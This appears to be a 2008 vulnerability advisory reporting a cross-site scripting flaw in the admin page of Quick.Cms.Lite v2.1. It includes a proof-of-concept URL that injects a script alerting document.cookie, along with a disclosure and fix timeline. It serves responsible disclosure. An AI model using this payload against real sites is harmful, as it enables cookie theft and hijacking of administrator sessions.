Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:20540
HistorySep 20, 2008 - 12:00 a.m.

[NOBYTES.COM: #14] Quick.Cms.Lite v2.1 Freeware - Cross Site Scripting

2008-09-2000:00:00
vulners.com
22

Application: Quick.Cms.Lite v2.1 Freeware
Authors Site: http://opensolution.org/quick.cms,en,10.html

±-------------------------------------------------------------+

XSS:

http://www.victim.com/admin.php?"><script>alert(document.cookie)</script><"

±[Notes:]-----------------------------------------------------+

This only appears to work on Internet Explorer.

Vulnerabilities found on: 05/09/2008
Author(s) Informed on: 06/09/2008
Author(s) Response: 08/09/2008
Author(s) Fix: 16/09/2008

[email protected]

http://www.NoBytes.com